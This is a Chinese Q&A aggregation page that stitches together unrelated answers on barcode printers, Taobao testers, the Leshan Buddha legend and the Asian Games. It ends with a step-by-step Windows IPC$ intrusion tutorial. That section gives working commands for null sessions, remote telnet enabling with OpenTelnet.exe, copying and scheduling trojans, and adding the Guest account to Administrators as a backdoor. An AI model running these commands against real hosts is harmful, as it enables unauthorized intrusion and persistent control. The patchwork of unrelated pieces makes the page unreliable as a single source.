手托資料庫
『壹』 熱轉印條碼列印機怎麼用
條碼列印機使用手冊:
1、列印機卷紙安裝。
1.1打開列印機上蓋,露出卷支倉。
1.2取出紙卷架。
1.3把紙卷由左置右套入紙卷架。
1.4把紙卷托架連同紙卷一起放回紙卷倉。
1.5將紙卷向左端靠齊。
1.6將托架上的擋板向左靠緊紙卷。
1.7打開列印頭模組。
1.8一手托住列印頭摸組避免掉落,將標簽穿過列印頭摸組下,另一隻手從標簽引導器中拉出標簽。
1.9讓標簽從滾軸上方穿過。
1.10向下合上列印頭摸組,直到聽到「喀嚓」的一聲。
1.11合上頂蓋,打開電源開關,若列印機電源已接通,直接按下FEED鍵
2、列印機碳帶安裝
2.1打開列印機上蓋,露出卷支倉。
2.2按下在列印機兩側的釋放鈕,打開列印頭摸組。
2.3向上打開列印頭摸組露出碳帶供應端。
2.4拆開碳帶包裝,取出碳帶和空卷芯
2.5將碳帶前端少量連接到空卷芯上。
2.6將碳帶安裝到碳帶供應端(先卡左端在壓入右端)。
2.7關上列印頭摸組在將空卷芯在碳帶回收端(先卡左端在壓入右端)。
2.8轉動列印頭摸組左端的齒輪,確定碳帶卷緊。
2.9同時向下按壓列印頭摸組兩側,直到聽到「咔噠」一聲。
3、連接列印機
3.1連接電源線,USB列印線。
3.2打開電源開關,放入隨機光碟安裝驅動。
(1)手托資料庫擴展閱讀:
條碼列印機優點:
它除了具有普通列印機的列印功能以外,它還具有的優點有。
1.工業級的品質,不受列印量的限制,可以24小時列印;
2.不受列印材料限制,可以列印PET、銅板紙、熱敏紙不幹膠標簽以及聚酯、PVC等合成材料和水洗標布料等;
3.採用熱轉印方式列印的文字與圖形具有防刮效果,採用特殊碳帶列印還可以使列印產品具有防水、防污、防腐蝕、耐高溫等特點;
4.列印速度極快,最快可以達到10英寸(24厘米)每秒;
5.可以列印連續的序列號,連接資料庫成批列印;
『貳』 淘寶走試客路線是什麼意思
是指那些走在消費者前沿的人群。在購物前,他們先從互聯網上免費索取相關商家的使用贈品。經過仔細試用與其他愛好者相互交流後才進行購買。試客提前告訴了更多消費者哪些經過試客認證,哪些要規避不好的地方。走在消費者前沿的群落更好的幫助大家健康消費。
"試客」在試用完之後,一般還需要對產品給出第三方試用報告。「試用」,是商家推銷產品的一種方式,最終目的還是讓你購買。試客,最基本的含義便是"試用的人」。與網路試客一樣,試客,是互聯網的產物。
只要你願意,你也可以當一回"試客「試客其實離你並不遙遠。路過茶葉店,漂亮的促銷員手托茶盤,放上小紙杯,請你品嘗剛上市的春茶,超市裡,玻璃罩罩著切成丁的牛肉乾,邊放好牙簽,請君隨意試吃;還有路邊派發的餐巾紙,小袋洗發水,小支洗面奶。
(2)手托資料庫擴展閱讀:
試客的人群定義:
時下,試客風潮的興起,使國內眾多網路中介平台陸續誕生,它們的經營模式多是以免費發送試用品為基礎,通過為合作企業進行消費數據調研分析、廣告位出售等有償服務獲得贏利,使得任何網民只要注冊為用戶,即可享受試用網提供的合作企業所贈試用品的所有免費服務。
形式看似簡單,但由此卻可以形成一個能夠帶動消費市場調研、個性化廣告方案推廣、資料庫營銷等多重業務領域增長的試客經濟產業鏈條。
要想成為試客並不難,任何網民只要登錄各大試用網站,填寫真實個人資料並申請所看中的商品,得到廠商審批後即可獲得郵寄的試用贈品,流程極其簡單。目前很多試用網站已經能為試客提供涵蓋吃、穿、用、玩各個方面數十個品牌的多種商品。
『叄』 向大大專利手托杯向大大內衣是申請專利的嗎
是的,而且向大大內衣都有檢驗報告的
『肆』 求樂山大佛的景點風光,故事,傳說和參觀注意的事項,一共400字以內,4年級作文
一直以來很多人都在探討傳說,今天我們把樂山大佛的傳說就好好整理了一下。不少人參觀過樂山大佛,可是你知道樂山大佛的 來歷嗎?傳說唐朝初年,凌雲山上有一座凌雲寺,凌雲寺里有一個老和尚,叫海通。當時凌雲山下,岷江、青衣江、大渡河三江匯流處,水深流急,波涌浪翻,經常吞沒行船,危害百姓。海通和尚眼看船毀人亡,心中十分不忍。他想三江水勢這樣猖獗,水中必有水怪。要是在這岩石上刻造佛像,借著菩薩的法力,定能降服水怪,使來往船隻不再受害。
樂山大佛:發源於川北大雪山的岷江,帶著大量的雪水,滾滾南下。當它進入成都平原,來到樂山城下,已經是一條水面開闊的大江了。在這里,它同波濤洶涌的大渡河,水流湍急的青衣江匯合。就在這三江匯合得地方,坐著一尊世界上最大的佛像 - 樂山凌雲大佛。
馳名中外的樂山大佛,端坐在樂山坡東面的凌雲山上。大佛高七十一米,面對三江,西望峨眉,依山而坐,雄偉庄嚴。難怪人們稱它:山是一尊佛,佛是一座山。這尊大佛是怎樣修起來的呢?
相傳,唐朝的時候,貴州有個和尚,法名海通,是一位博學多才的高僧。他雲游四海,發願要為百姓做善事。這年夏天,他來到四川嘉州。不久聽說府城城東凌雲山下江水洶涌、波浪滔天,常常掀翻船隻,危害生靈。一天,他想親自去查看一下,便攀著岩壁來到凌雲山腳。忽見一個激浪打在岩上,浪頭退去後,一個壯年漢子躺在水邊,左手拿鑽,右手拿錘,一動不動。海通和尚忙上前,把漢子背到岸上,過了好一陣,他才慢慢蘇醒過來。
原來,那漢子名叫石青,是個石匠,他見凌雲山下水勢凶勐,來往船隻常常翻沉,許多船工兄弟白白地送了性命,心裡實在不忍,便決心在石壁上鑿一路篙眼,好讓船工們的竹篙插在篙眼中,撐住木船不碰在石壁上。不料剛打了幾下,一個惡浪撲來,他就什麼也不知道了。石青的行動感動了海通。第二天,海通和石青相約又登上凌雲山察看。他們站在百丈懸崖上,只見下面灘險水惡,江濤洶涌澎湃,如萬馬奔騰,直向峭壁沖來,發出驚天動地的響聲。這時,正有一隻木船順江而下。
樂山大佛的傳說有點像鬼故事啊!突然,那船就象離弦的箭飛奔而來。眼看靠近岩石,這時,水中勐地出現一個怪物,掀起一股黑浪,把木船吞沒了。海通一迭連聲地口念「阿彌陀佛」,石青怒不可遏,苦於沒有降妖的法力。海通道:」不如在這山岩上鑿一尊彌勒大佛,一來借佛祖法力收妖鎮怪,二來也可減弱水勢,保護行船。」石青聽了連連點頭。於是,石青就在凌雲山上打了個石洞,讓海通和尚在洞內居住下來。
在樂山大佛外圍,發現了一尊全身長達 4000 余米,有幾座山體組成的「巨型睡佛」。這尊睡佛四肢齊全,體態勻稱,面目清秀,安詳地漂卧在青衣江山嵴在線,仰面朝天,慈祥凝重。著名的樂山大佛不偏不倚正好端坐在巨佛心臟部位。巨佛的頭、身、足,分別由烏尤山、凌雲山和龜城山三山連襟組成。佛頭由整個烏尤山構成,山上的石、翠竹、綠蔭、山徑、亭閣、寺廟,分別呈現為巨佛的發髻、睫毛 鼻樑、雙唇和下顎;佛身由凌雲山構成,山上九峰相連,猶如巨佛寬廣的胸膛、渾圓的腰和健美的腿;腳板翹起的佛足是龜城山的一部分。佛的整個體態十分逼真、自然、和諧,猶如天造地設,毫無人工刀跡斧痕。現觀看卧佛的最佳位置就在樂山市濱江路「福全門」。
無獨有偶,此後不久樂山市又發現一尊形態逼真長 3000 米的巨型「女卧佛」,它由三龜山、東岩山構成。下龜山為女佛的頭,下、中龜山間為其頸,中龜山一峰凸起猶如其胸,上龜山、東岩山為其雙腿。兩佛抵足相連。觀看女佛在「福全門」上游百米之內。
海通和石青一面察看水勢,一面測量地形,分頭准備凋刻大佛的事。海通和尚翻山越嶺,行船過水,到江淮一帶募化資金;石青在嘉州城鄉物色能工巧匠,打造工具。經過了 三年的准備,開元六年便開始動工了。
海通和石青修大佛的事,一傳十,十傳百,很快傳了開去。方圓數十里的百姓,出力的出力,出錢的出錢,紛紛前來相助。一時間,凌雲山上,千人揮臂,萬人吶喊,鬧騰起來。從山岩上打下的石頭,象下雨一樣轟隆隆地掉進河裡,激起無數浪花。
誰知,滾滾而下的巨石驚動了江底的那條妖龍。它是李冰當年修都江堰時,用鐵鏈鎖在江底的一條孽龍。因鐵鏈年久銹壞,孽龍掙脫枷鎖,逃到凌雲山下,興風作浪,為所欲 為。這孽龍見山上滾下許多石頭,堵住了洞口,忙施起妖法,掀起狂風惡浪,把海通和尚捲入洞中。
石青見妖龍捲走了海通和尚,忙帶領眾石匠,拿著鐵釺、鑽子、鐵錘等工具下去尋找。不一會兒,找到了石洞,石青領頭殺了進去,只見孽龍支使一群小妖正要將海通押向油鍋。石青大喊一聲:「哪裡來的妖龍,膽敢傷我法師!」隨即帶領眾石匠沖了過去,將孽龍團團圍住。孽龍見寡不敵眾,只得逃下了江底。
工匠們又繼續鑿岩刻佛。可是沒多久,平地忽然狂風不止,飛沙定石,天昏地暗,暴雨傾盆而下,接連下了七七四十九天,凌雲山上洪水暴發,一股股山洪直沖大佛頭頂。海通和尚發愁了:這樣大的洪水,即使是銅鑄鐵造的佛像也會沖壞的。石青眉頭一皺,計上心來,忙安慰海通說:「師父不要擔憂,我自有辦法。」他和眾石匠商量,決定在大佛頭上、身上修鑿排水溝排水泄流。只見石青腰系繩索,冒著生命危險,懸空鑿石。狂風和洪水一次又一次將他沖得懸空吊在半岩上,他一次又一次攀著繩索爬了上去。石青和眾工匠們捨生忘死,堅持不懈,終於鑿成了排水溝,消除了洪水的沖蝕。
那時,嘉州新任一個刺史,愛財如命。他打聽到海通和尚募化了許多銀子,就帶著一群衙役來到凌雲山上,氣勢洶洶地對海通說:「大膽和尚,你未經官府許可,私自動工興修大佛,該當何罪?來人,給我鎖走!」幾個衙役沖過去就要動手,只見石青伸手擋住說:「修大佛是為了鎮妖降魔,減弱水勢,解除災害,有什麼罪過?你們要鎖鎖我吧!」海通忙對石青說:「工地上沒你不行,天大的事我來承擔。」那貪官見風轉舵,便裝模做樣地說,「和尚聽著,本官姑念你是出家之人,可免你牢獄之苦。不過,你等破壞我嘉州風水,得拿出白銀三萬兩賠償。」海通一聽這貪官原是來敲竹杠的,頓時胸中升起一股怒火,說:「這銀子來自千千萬萬的善男信女,我海通怎敢動用半文。自目可剜,佛財難得 !」
樂山大佛的傳說之狗官以為海通是說話來嚇人的,就說:「那就把你的眼睛剜出來給本官看看。」海通聽了,冷然一笑,不慌不忙地將雙指插入自己的眼睛。兩顆跟珠落入了手中的盤子里。海通端著盤子,直向面前的貪官走去。邊走邊說:「拿去吧!」貪官和那些狐群狗黨,見海通和尚剜下雙目,毫不動容,一個個嚇得目瞪口呆,灰熘熘地逃回去了。海通雖然失掉了兩隻眼睛,但刻佛的意志毫不動搖。對修建大佛更加關心,常常拄著拐杖,由小沙彌扶著,來到工地, 陪伴石匠們幹活。大家見了,感動不已,含著眼淚勸他回去休息。海通執意不肯,說:「我雖不能看著大佛建成,也要聽著你們把大佛建成啊!」
然而,樂山大佛的傳說之主角海通生前並沒有實現自己的宏願,不幾年,他就圓寂歸天了。以後,石青等老石匠也相繼去世了。後來,西川節度使韋皋繼承了海通和石青的事業,組織人力物力繼續開鑿,直到唐德宗貞元十九年,整整花了九十年,才修鑿完工。後來,人們為了紀念海通,就把他當年住過的山洞叫做「海師洞」。直到現在,洞內還有一個盤膝而坐、神情堅毅、手托盛眼珠的玉盤的海通塑像。
這座大佛開鑿於唐玄宗開元初年( 713 年),由凌雲寺的海通和尚發起造像,工程一度中斷,直到唐德宗貞元十九年( 803 年),才由劍南西川節度使韋皋完成,歷時九十年。
令人驚異的是,在沒有科學儀器的情況下,古人是用什麼方法保證它的各個部分之間比例適當、體態均稱的呢? 細心的遊人會發現大佛的兩耳和頭顱後面,鑿有縱橫的排水溝,一場大雨後,積水很快就通過這些排水溝排走了,使佛像不至為雨水侵蝕。這座大佛,經過一千多年仍能保持完好,在一定程度上要歸功於這套科學的排水系統。 1990 年國家撥款對大佛進行了比較徹底的維修。同時增加了一些配套設施及服務設施。把這一旅遊點建設得更加完善。
大佛背靠山崖,面臨大江。當遊客們觀賞大佛時,同時也就游覽了凌雲山的勝景。 大佛背靠得這座凌雲山早在隋唐時就是著名的風景區和佛教勝地。
以上就是《樂山大佛的傳說》希望大家有所了解!讓你知道樂山大佛的方方面面,過去種種
『伍』 寫一篇亞運的周記
2010年11月12日在中國廣州又迎來了在中國舉辦的第二次亞運會,廣州亞運會的開幕式彷彿是一台氣勢恢弘的史詩般傑作,一開始的千人擊缶氣勢磅薄;接著的飛天翱翔五環激盪。中國畫寫意淋漓盡致;傳統武術博大精深。造紙術、活字印刷術、和火葯通過藝術與科技的手法一一展示。時間不長的一個多小時文藝節目將晚會推向了一個又一個高潮。現場觀眾歡呼聲如浪潮般此起彼伏,相機的閃光燈如同銀河群星般閃耀。當各國運動員入場後???通過獨特的方式將亞運聖火點燃,開幕式更是到了一個彷彿瘋狂的高潮,那一刻,體育館沸騰了,廣州沸騰了,全中國沸騰了。
說句實話,這次的廣州亞運會開幕式是我見過有史以來亞運會最精彩的一次,具有很強的藝術感染力和震憾力。它向全世界表達了一種理念,向全世界表達了一種承諾「人文亞運,綠色亞運,科技亞運。」在10年這樣一個國際國內形勢如此困難的時刻,我們不僅如期舉辦了開幕式,而且還如此的成功。這充分表明了我們國家的綜合國力是強大的,我們中國人民是不可戰勝了。我深為自已是中華一分子而興奮和自豪。中國加油!
『陸』 區域網內可以空鏈接對方機,用什麼方法入侵呢
ipc$空連接使用
[ 2006-9-20 10:32:51 | By: yunlin2000 ]
目錄 :
一 前言
二 什麼是ipc$
三 什麼是空會話
四 空會話可以做什麼
五 ipc$連接所使用的埠
六 ipc$連接在hack攻擊中的意義
七 ipc$連接失敗的常見原因
八 復制文件失敗的原因
九 如何打開目標的IPC$共享以及其他共享
十 一些需要shell才能完成的命令
十一 入侵中可能會用到的相關命令
十二 ipc$完整入侵步驟祥解
十三 如何防範ipc$入侵
十四 ipc$入侵問答精選
十五 結束的話
一 前言
網上關於ipc$入侵的文章可謂多如牛毛,而且也不乏優秀之作,攻擊步驟甚至可以說已經成為經典的模式,因此也沒人願意再把這已經成為定式的東西拿出來擺弄。
不過話雖這樣說,但我個人認為這些文章講解的並不詳細,對於第一次接觸ipc$的菜鳥來說,簡單的羅列步驟並不能解答他們的種種迷惑(你隨便找一個hack論壇搜一下ipc$,看看存在的疑惑有多少)。因此我參考了網上的一些資料,教程以及論壇帖子,寫了這篇總結性質的文章,想把一些容易混淆,容易迷惑人的問題說清楚,讓大家不要總徘徊在原地!
注意:本文所討論的各種情況均默認發生在win NT/2000環境下,win98將不在此次討論之列,而鑒於win Xp在安全設置上有所提高,個別操作並不適用,有機會將單獨討論。
二 什麼是ipc$
IPC$(Internet Process Connection)是共享"命名管道"的資源,它是為了讓進程間通信而開放的命名管道,通過提供可信任的用戶名和口令,連接雙方可以建立安全的通道並以此通道進行加密數據的交換,從而實現對遠程計算機的訪問。IPC$是NT/2000的一項新功能,它有一個特點,即在同一時間內,兩個IP之間只允許建立一個連接。NT/2000在提供了ipc$功能的同時,在初次安裝系統時還打開了默認共享,即所有的邏輯共享(c$,d$,e$……)和系統目錄winnt或windows(admin$)共享。所有的這些,微軟的初衷都是為了方便管理員的管理,但在有意無意中,導致了系統安全性的降低。
平時我們總能聽到有人在說ipc$漏洞,ipc$漏洞,其實ipc$並不是一個真正意義上的漏洞,我想之所以有人這么說,一定是指微軟自己安置的那個『後門』:空會話(Null session)。那麼什麼是空會話呢?
三 什麼是空會話
在介紹空會話之前,我們有必要了解一下一個安全會話是如何建立的。
在Windows NT 4.0中是使用挑戰響應協議與遠程機器建立一個會話的,建立成功的會話將成為一個安全隧道,建立雙方通過它互通信息,這個過程的大致順序如下:
1)會話請求者(客戶)向會話接收者(伺服器)傳送一個數據包,請求安全隧道的建
立;
2)伺服器產生一個隨機的64位數(實現挑戰)傳送回客戶;
3)客戶取得這個由伺服器產生的64位數,用試圖建立會話的帳號的口令打亂它,將結
果返回到伺服器(實現響應);
4)伺服器接受響應後發送給本地安全驗證(LSA),LSA通過使用該用戶正確的口令來核實響應以便確認請求者身份。如果請求者的帳號是伺服器的本地帳號,核實本地發生;如果請求的帳號是一個域的帳號,響應傳送到域控制器去核實。當對挑戰的響應核實為正確後,一個訪問令牌產生,然後傳送給客戶。客戶使用這個訪問令牌連接到伺服器上的資源直到建議的會話被終止。
以上是一個安全會話建立的大致過程,那麼空會話又如何呢?
空會話是在沒有信任的情況下與伺服器建立的會話(即未提供用戶名與密碼),但根據WIN2000的訪問控制模型,空會話的建立同樣需要提供一個令牌,可是空會話在建立過程中並沒有經過用戶信息的認證,所以這個令牌中不包含用戶信息,因此,這個會話不能讓系統間發送加密信息,但這並不表示空會話的令牌中不包含安全標識符SID(它標識了用戶和所屬組),對於一個空會話,LSA提供的令牌的SID是S-1-5-7,這就是空會話的SID,用戶名是:ANONYMOUS LOGON(這個用戶名是可以在用戶列表中看到的,但是是不能在SAM資料庫中找到,屬於系統內置的帳號),這個訪問令牌包含下面偽裝的組:
Everyone
Network
在安全策略的限制下,這個空會話將被授權訪問到上面兩個組有權訪問到的一切信息。那麼建立空會話到底可以作什麼呢?
四 空會話可以做什麼
對於NT,在默認安全設置下,藉助空連接可以列舉目標主機上的用戶和共享,訪問everyone許可權的共享,訪問小部分注冊表等,並沒有什麼太大的利用價值;對2000作用更小,因為在Windows 2000 和以後版本中默認只有管理員和備份操作員有權從網路訪問到注冊表,而且實現起來也不方便,需藉助工具。從這些我們可以看到,這種非信任會話並沒有多大的用處,但從一次完整的ipc$入侵來看,空會話是一個不可缺少的跳板,因為我們從它那裡可以得到戶列表,這對於一個老練的黑客已經足夠了。以下是空會話中能夠使用的具體命令:
1 首先,我們先建立一個空會話(需要目標開放ipc$)
命令:net use \\ip\ipc$ "" /user:""
注意:上面的命令包括四個空格,net與use中間有一個空格,use後面一個,密碼左右各一個空格。
2 查看遠程主機的共享資源
命令:net view \\IP
解釋:建立了空連接後,用此命令可以查看遠程主機的共享資源,如果它開了共享,可以得到如下類似類似結果:
在 \\*.*.*.*的共享資源
資源共享名 類型 用途 注釋
-----------------------------------------------------------
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
命令成功完成。
3 查看遠程主機的當前時間
命令:net time \\IP
解釋:用此命令可以得到一個遠程主機的當前時間。
4 得到遠程主機的NetBIOS用戶名列表(需要打開自己的NBT)
nbtstat -A IP
用此命令可以得到一個遠程主機的NetBIOS用戶名列表(需要你的netbios支持),返回如下結果:
Node IpAddress: [*.*.*.*] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
SERVER <00> UNIQUE Registered
OYAMANISHI-H <00> GROUP Registered
OYAMANISHI-H <1C> GROUP Registered
SERVER <20> UNIQUE Registered
OYAMANISHI-H <1B> UNIQUE Registered
OYAMANISHI-H <1E> GROUP Registered
SERVER <03> UNIQUE Registered
OYAMANISHI-H <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
INet~Services <1C> GROUP Registered
IS~SERVER......<00> UNIQUE Registered
MAC Address = 00-50-8B-9A-2D-37
以上就是我們經常使用空會話做的事情,好像也能獲得不少東西喲,不過要注意一點:建立IPC$連接的操作會在EventLog中留下記錄,不管你是否登錄成功。 好了,那麼下面我們就來看看ipc$所使用的埠是什麼?
五 ipc$所使用的埠
首先我們來了解一些基礎知識:
1 SMB:(Server Message Block) Windows協議族,用於文件列印共享的服務;
2 NBT:(NETBios Over TCP/IP)使用137(UDP)138(UDP)139(TCP)埠實現基於TCP/IP協議的NETBIOS網路互聯。
3 在WindowsNT中SMB基於NBT實現,而在Windows2000中,SMB除了基於NBT實現,還可以直接通過445埠實現。
有了這些基礎知識,我們就可以進一步來討論訪問網路共享對埠的選擇了:
對於win2000客戶端來說:
1 如果在允許NBT的情況下連接伺服器時,客戶端會同時嘗試訪問139和445埠,如果445埠有響應,那麼就發送RST包給139埠斷開連接,用455埠進行會話,當445埠無響應時,才使用139埠,如果兩個埠都沒有響應,則會話失敗;
2 如果在禁止NBT的情況下連接伺服器時,那麼客戶端只會嘗試訪問445埠,如果445埠無響應,那麼會話失敗。由此可見,禁止了NBT後的win 2000對win NT的共享訪問將會失敗。
對於win2000伺服器端來說:
1 如果允許NBT, 那麼UDP埠137, 138, TCP 埠 139, 445將開放;
2 如果禁止NBT,那麼只有445埠開放。
我們建立的ipc$會話對埠的選擇同樣遵守以上原則。顯而易見,如果遠程伺服器沒有監聽139或445埠,ipc$會話是無法建立的。
六 ipc$連接在hack攻擊中的意義
就像上面所說的,即使你建立了一個空的連接,你也可以獲得不少的信息(而這些信息往往是入侵中必不可少的),如果你能夠以某一個具有一定許可權的用戶身份登陸的話,那麼你就會得到相應的許可權,顯然,如果你以管理員身份登陸,嘿嘿,那你可就了不得了,基本上可以為所欲為了。不過你也不要高興的太早,因為管理員的密碼不是那麼好搞到的,雖然會有一些粗心的管理員存在弱口令,但這畢竟是少數,而且現在不比從前了,隨著人們安全意識的提高,管理員們也愈加小心了,得到管理員密碼將會越來越難的,因此今後你最大的可能就是以極小的許可權甚至是沒有許可權進行連接,甚至在主機不開啟ipc$共享時,你根本就無法連接,你會慢慢的發現ipc$連接並不是萬能的,所以不要奢望每次連接都能成功,那是不現實的。
是不是有些灰心?倒也不用,關鍵是我們要擺正心態,不要把ipc$入侵當作終極武器,不要認為它戰無不勝,它只是很多入侵方法中的一種,你有可能利用它一擊必殺,也有可能一無所獲,這些都是正常的,在黑客的世界裡,不是每條大路都能通往羅馬,但總有一條路會通往羅馬,耐心的尋找吧!
七 ipc$連接失敗的常見原因
以下是一些常見的導致ipc$連接失敗的原因:
1 IPC連接是Windows NT及以上系統中特有的功能,由於其需要用到Windows NT中很多DLL函數,所以不能在Windows 9.x/Me系統中運行,也就是說只有nt/2000/xp才可以相互建立ipc$連接,98/me是不能建立ipc$連接的;
2 如果想成功的建立一個ipc$連接,就需要對方開啟ipc$共享,即使是空連接也是這樣,如果對方關閉了ipc$共享,你將會建立失敗;
3 你未啟動Lanmanworkstation服務,它提供網路鏈結和通訊,沒有它你無法發起連接請求(顯示名為:Workstation);
4 對方未啟動Lanmanserver服務,它提供了 RPC 支持、文件、列印以及命名管道共享,ipc$依賴於此服務,沒有它遠程主機將無法響應你的連接請求(顯示名為:Server);
5 對方未啟動NetLogon,它支持網路上計算機 pass-through 帳戶登錄身份;
6 對方禁止了NBT(即未打開139埠);
7 對方防火牆屏蔽了139和445埠;
8 你的用戶名或者密碼錯誤(顯然空會話排除這種錯誤);
9 命令輸入錯誤:可能多了或少了空格,當用戶名和密碼中不包含空格時兩邊的雙引號可以省略,如果密碼為空,可以直接輸入兩個引號""即可;
10 如果在已經建立好連接的情況下對方重啟計算機,那麼ipc$連接將會自動斷開,需要重新建立連接。
另外,你也可以根據返回的錯誤號分析原因:
錯誤號5,拒絕訪問:很可能你使用的用戶不是管理員許可權的,先提升許可權;
錯誤號51,Windows無法找到網路路徑:網路有問題;
錯誤號53,找不到網路路徑:ip地址錯誤;目標未開機;目標lanmanserver服務未啟動;目標有防火牆(埠過濾);
錯誤號67,找不到網路名:你的lanmanworkstation服務未啟動或者目標刪除了ipc$;
錯誤號1219,提供的憑據與已存在的憑據集沖突:你已經和對方建立了一個ipc$,請刪除再連;
錯誤號1326,未知的用戶名或錯誤密碼:原因很明顯了;
錯誤號1792,試圖登錄,但是網路登錄服務沒有啟動:目標NetLogon服務未啟動;
錯誤號2242,此用戶的密碼已經過期:目標有帳號策略,強制定期要求更改密碼。
八 復制文件失敗的原因
有些朋友雖然成功的建立了ipc$連接,但在時卻遇到了這樣那樣的麻煩,無法復製成功,那麼導致復制失敗的常見原因又有哪些呢?
1 盲目復制
這類錯誤出現的最多,佔到50%以上。許多朋友甚至都不知道對方是否有共享文件夾,就進行盲目復制,結果導致復制失敗而且郁悶的很。因此我建議大家在進行復制之前務必用net view \\IP這個命令看一下對方的共享情況,不要認為ipc$連接建立成功了就一定有共享文件夾。
2 默認共享判斷錯誤
這類錯誤也是大家經常犯的,主要有兩個小方面:
1)錯誤的認為能建立ipc$連接的主機就一定開啟了默認共享,因而在建立完連接之後馬上向admin$之類的默認共享復制文件,導致復制失敗。ipc$連接成功只能說明對方打開了ipc$共享,ipc$共享與默認共享是兩碼事,ipc$共享是一個命名管道,並不是哪個實際的文件夾,而默認共享並不是ipc$共享的必要條件;
2)由於net view \\IP 無法顯示默認共享(因為默認共享帶$),因此通過這個命令,我們並不能判斷對方是否開啟了默認共享,因此如果對方未開啟默認共享,那麼所有向默認共享進行的操作都不能成功;(不過大部分掃描軟體在掃弱口令的同時,都能掃到默認共享目錄,可以避免此類錯誤的發生)
3用戶許可權不夠,包括四種情形:
1)空連接向所有共享(默認共享和普通共享)復制時,大多情況下許可權是不夠的;
2)向默認共享復制時,要具有管理員許可權;
3)向普通共享復制時,要具有相應許可權(即對方事先設定的訪問許可權);
4)對方可以通過防火牆或安全軟體的設置,禁止外部訪問共享;
還需要說明一點:不要認為administrator就一定是管理員,管理員名稱是可以改的。
4被防火牆殺死或在區域網
也許你的復制操作已經成功,但當遠程運行時,被防火牆殺掉了,導致找不到文件;還有可能你把木馬復制到了區域網內的主機,導致連接失敗。因此建議你復制時要小心,否則就前功盡棄了。
呵呵,大家也知道,ipc$連接在實際操作過程中會出現千奇百怪的問題,上面我所總結的只是一些常見錯誤,沒說到的,只能讓大家自己去體會了。
九 如何打開目標的IPC$共享以及其他共享
目標的ipc$不是輕易就能打開的,否則就要天下打亂了。你需要一個admin許可權的shell,比如telnet,木馬等,然後在shell下執行net share ipc$來開放目標的ipc$,用net share ipc$ /del來關閉共享。如果你要給它開共享文件夾,你可以用net share baby=c:\,這樣就把它的c盤開為共享名為baby共享了。
十 一些需要shell才能完成的命令
看到很多教程這方面寫的十分不準確,一些需要shell才能完成命令就簡簡單單的在ipc$連接下執行了,起了誤導作用。那麼下面我總結一下需要在shell才能完成的命令:
1 向遠程主機建立用戶,激活用戶,修改用戶密碼,加入管理組的操作需要在shell下完成;
2 打開遠程主機的ipc$共享,默認共享,普通共享的操作需要在shell下完成;
3 運行/關閉遠程主機的服務,需要在shell下完成;
4 啟動/殺掉遠程主機的進程,也需要在shell下完成。
十一 入侵中可能會用到的相關命令
請注意命令適用於本地還是遠程,如果適用於本地,你只能在獲得遠程主機的shell後,才能向遠程主機執行。
1 建立空連接:
net use \\IP\ipc$ "" /user:""
2 建立非空連接:
net use \\IP\ipc$ "psw" /user:"account"
3 查看遠程主機的共享資源(但看不到默認共享)
net view \\IP
4 查看本地主機的共享資源(可以看到本地的默認共享)
net share
5 得到遠程主機的用戶名列表
nbtstat -A IP
6 得到本地主機的用戶列表
net user
7 查看遠程主機的當前時間
net time \\IP
8 顯示本地主機當前服務
net start
9 啟動/關閉本地服務
net start 服務名 /y
net stop 服務名 /y
10 映射遠程共享:
net use z: \\IP\baby
此命令將共享名為baby的共享資源映射到z盤
11 刪除共享映射
net use c: /del 刪除映射的c盤,其他盤類推
net use * /del /y刪除全部
12 向遠程主機復制文件
\路徑\srv.exe \\IP\共享目錄名,如:
ccbirds.exe \\*.*.*.*\c 即將當前目錄下的文件復制到對方c盤內
13 遠程添加計劃任務
at \\ip 時間 程序名,如:
at \\127.0.0.0 11:00 love.exe
注意:時間盡量使用24小時制;在系統默認搜索路徑(比如system32/)下不用加路徑,否則必須加全路徑
14 開啟遠程主機的telnet
這里要用到一個小程序:opentelnet.exe,各大下載站點都有,而且還需要滿足四個要求:
1)目標開啟了ipc$共享
2)你要擁有管理員密碼和帳號
3)目標開啟RemoteRegistry服務,用戶就該ntlm認證
4)對WIN2K/XP有效,NT未經測試
命令格式:OpenTelnet.exe \\server account psw NTLM認證方式 port
試例如下:c:\>OpenTelnet.exe \\*.*.*.* administrator "" 1 90
15 激活用戶/加入管理員組
1 net uesr account /active:yes
2 net localgroup administrators account /add
16 關閉遠程主機的telnet
同樣需要一個小程序:ResumeTelnet.exe
命令格式:ResumeTelnet.exe \\server account psw
試例如下:c:\>ResumeTelnet.exe \\*.*.*.* administrator ""
17 刪除一個已建立的ipc$連接
net use \\IP\ipc$ /del
(本教程不定期更新,欲獲得最新版本,請登陸官方網站:菜菜鳥社區原創http://ccbirds.yeah.net)
十二 ipc$完整入侵步驟祥解
其實入侵步驟隨個人愛好有所不同,我就說一下常見的吧,呵呵,獻丑了!
1 用掃描軟體搜尋存在若口令的主機,比如流光,SSS,X-scan等,隨你的便,然後鎖定目標,如果掃到了管理員許可權的口令,你可以進行下面的步驟了,假設你現在得到了administrator的密碼為空
2 此時您有兩條路可以選擇:要麼給對方開telnet(命令行),要麼給它傳木馬(圖形界面),那我們就先走telnet這條路吧
3上面開telnet的命令沒忘吧,要用到opentelnet這個小程序
c:\>OpenTelnet.exe \\192.168.21.* administrator "" 1 90
如果返回如下信息
*******************************************************
Remote Telnet Configure, by refdom
Email: [email protected]
OpenTelnet.exe
Usage:OpenTelnet.exe \\server username password NTLMAuthor telnetport
*******************************************************
Connecting \\192.168.21.*...Successfully!
NOTICE!!!!!!
The Telnet Service default setting:NTLMAuthor=2 TelnetPort=23
Starting telnet service...
telnet service is started successfully! telnet service is running!
BINGLE!!!Yeah!!
Telnet Port is 90. You can try:"telnet ip 90", to connect the server!
Disconnecting server...Successfully!
*說明你已經打開了一個埠90的telnet。
4 現在我們telnet上去
telnet 192.168.21.* 90
如果成功,你將獲得遠程主機的一個shell,此時你可以像控制自己的機器一樣控制你的肉雞了,那麼做點什麼呢?把guest激活再加入管理組吧,就算留個後門了
5 C:\>net user guest /active:yes
*將Guest用戶激活,也有可能人家的guest本來就試活的,你可以用net user guest看一下它的帳戶啟用的值是yes還是no
6 C:\>net user guest 1234
*將Guest的密碼改為1234,或者改成你喜歡的密碼
7 C:\>net localgroup administrators guest /add
*將Guest變為Administrator,這樣,即使以後管理員更改了他的密碼,我們也可以用guest登錄了,不過也要提醒您,因為通過安全策略的設置,可以禁止guest等帳戶的遠程訪問,呵呵,如果真是這樣,那我們的後門也就白做了,願上帝保佑Guest。
